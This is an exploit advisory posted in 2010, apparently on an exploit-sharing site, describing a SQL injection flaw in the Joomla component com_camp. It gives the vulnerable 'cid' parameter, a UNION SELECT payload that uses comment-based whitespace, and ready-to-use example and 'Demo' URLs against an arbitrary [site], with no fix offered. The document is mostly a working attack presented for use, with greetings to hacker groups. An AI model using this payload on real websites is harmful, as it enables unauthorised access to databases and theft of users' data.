Joomla Component com_camp SQL Injection Vulnerability

2010-05-16 09:04:01

[+] Title : Joomla Component com_camp SQL Injection Vulnerability
[+] Author: Kernel Security Group
[+] Data : 2010-05-15

[!]#####################################################################################################[!]

[+] Title : Joomla Component com_camp SQL Injection Vulnerability
[+] Author : Kernel Security Group By D3v1l.blackhat
[+] Homepage : http://www.KernelSec.com
[+] Email : [email protected]

[!]#####################################################################################################[!]

[+] Vulnerable File :

http://127.0.0.1/index.php?option=com_camp&task=show&cid=[SQL]

[+] ExploiT :

-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--

[+] Example :

http://127.0.0.1/index.php?option=com_camp&task=show&cid=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--

[+] Demo :

http://[site]/index.php?option=com_camp&task=show&cid=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--


[!]#####################################################################################################[!]

[+] Special Thanks To My Best FriendS :

Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS

[+] IRANIAN Young HackerZ

[+] GreetZ : Exploit-DB TeaM

[!]#####################################################################################################[!]

Fixes

No fixes

In order to submit a new fix you need to be registered.